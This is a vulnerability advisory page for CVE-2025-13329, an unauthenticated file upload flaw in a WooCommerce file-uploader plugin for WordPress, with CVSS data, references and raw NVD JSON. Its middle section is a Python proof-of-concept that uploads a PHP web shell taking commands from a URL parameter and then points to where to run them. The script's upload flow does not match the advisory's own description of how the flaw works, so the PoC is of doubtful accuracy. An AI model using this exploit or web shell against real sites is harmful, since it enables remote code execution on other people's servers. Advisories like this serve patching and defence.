Security Vulnerability Report
CVE-2025-13329 CVSS 9.8 CRITICAL

CVE-2025-13329

Published: 2025-12-20 04:16:07
Last Modified: 2026-04-15 00:35:42

Description

The File Uploader for WooCommerce plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the callback function for the 'add-image-data' REST API endpoint in all versions up to, and including, 1.0.3. This makes it possible for unauthenticated attackers to upload arbitrary files to the Uploadcare service and subsequently download them on the affected site's server, which may make remote code execution possible.

CVSS Details

CVSS Score: 9.8
Severity: CRITICAL
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

File Uploader for WooCommerce <= 1.0.3

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests
import json

# CVE-2025-13329 PoC - File Uploader for WooCommerce Arbitrary File Upload
# Target: WordPress site with File Uploader for WooCommerce plugin <= 1.0.3

TARGET_URL = "https://vulnerable-site.com"
WP_REST_API = f"{TARGET_URL}/wp-json/file-uploader/v1/add-image-data"

# Malicious PHP file content for RCE
php_payload = "<?php if(isset($_GET['cmd'])){ system($_GET['cmd']); } ?>"

# Prepare the malicious file
files = {
    'file': ('shell.php', php_payload, 'application/x-php')
}

# Send the malicious file upload request
response = requests.post(WP_REST_API, files=files, verify=False)

print(f"Status Code: {response.status_code}")
print(f"Response: {response.text}")

# If successful, the attacker can then download and execute the shell
if response.status_code in [200, 201]:
    result = response.json()
    print("File uploaded successfully!")
    print(f"File URL: {result.get('file_url', 'Check response')}")
    print(f"Now access the shell at: {TARGET_URL}/wp-content/uploads/{result.get('filename', 'shell.php')}?cmd=whoami")

References

https://plugins.trac.wordpress.org/changeset/3423070/file-uploader-for-woocommerce/trunk/src/Helpers/class-uploaderhelper.php
https://wordpress.org/plugins/file-uploader-for-woocommerce/
https://www.wordfence.com/threat-intel/vulnerabilities/id/da0f0e1a-bbf8-42a5-b330-b53134488ebd?source=cve

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-13329",
    "sourceIdentifier": "[email protected]",
    "published": "2025-12-20T04:16:07.207",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The File Uploader for WooCommerce plugin for WordPress is vulnerable to arbitrary file uploads due to missing file type validation in the callback function for the 'add-image-data' REST API endpoint in all versions up to, and including, 1.0.3. This makes it possible for unauthenticated attackers to upload arbitrary files to the Uploadcare service and subsequently download them on the affected site's server which may make remote code execution possible."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "[email protected]",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
            "baseScore": 9.8,
            "baseSeverity": "CRITICAL",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "NONE",
            "scope": "UNCHANGED",
            "confidentialityImpact": "HIGH",
            "integrityImpact": "HIGH",
            "availabilityImpact": "HIGH"
          },
          "exploitabilityScore": 3.9,
          "impactScore": 5.9
        }
      ]
    },
    "weaknesses": [
      {
        "source": "[email protected]",
        "type": "Secondary",
        "description": [
          {
            "lang": "en",
            "value": "CWE-434"
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://plugins.trac.wordpress.org/changeset/3423070/file-uploader-for-woocommerce/trunk/src/Helpers/class-uploaderhelper.php",
        "source": "[email protected]"
      },
      {
        "url": "https://wordpress.org/plugins/file-uploader-for-woocommerce/",
        "source": "[email protected]"
      },
      {
        "url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/da0f0e1a-bbf8-42a5-b330-b53134488ebd?source=cve",
        "source": "[email protected]"
      }
    ]
  }
}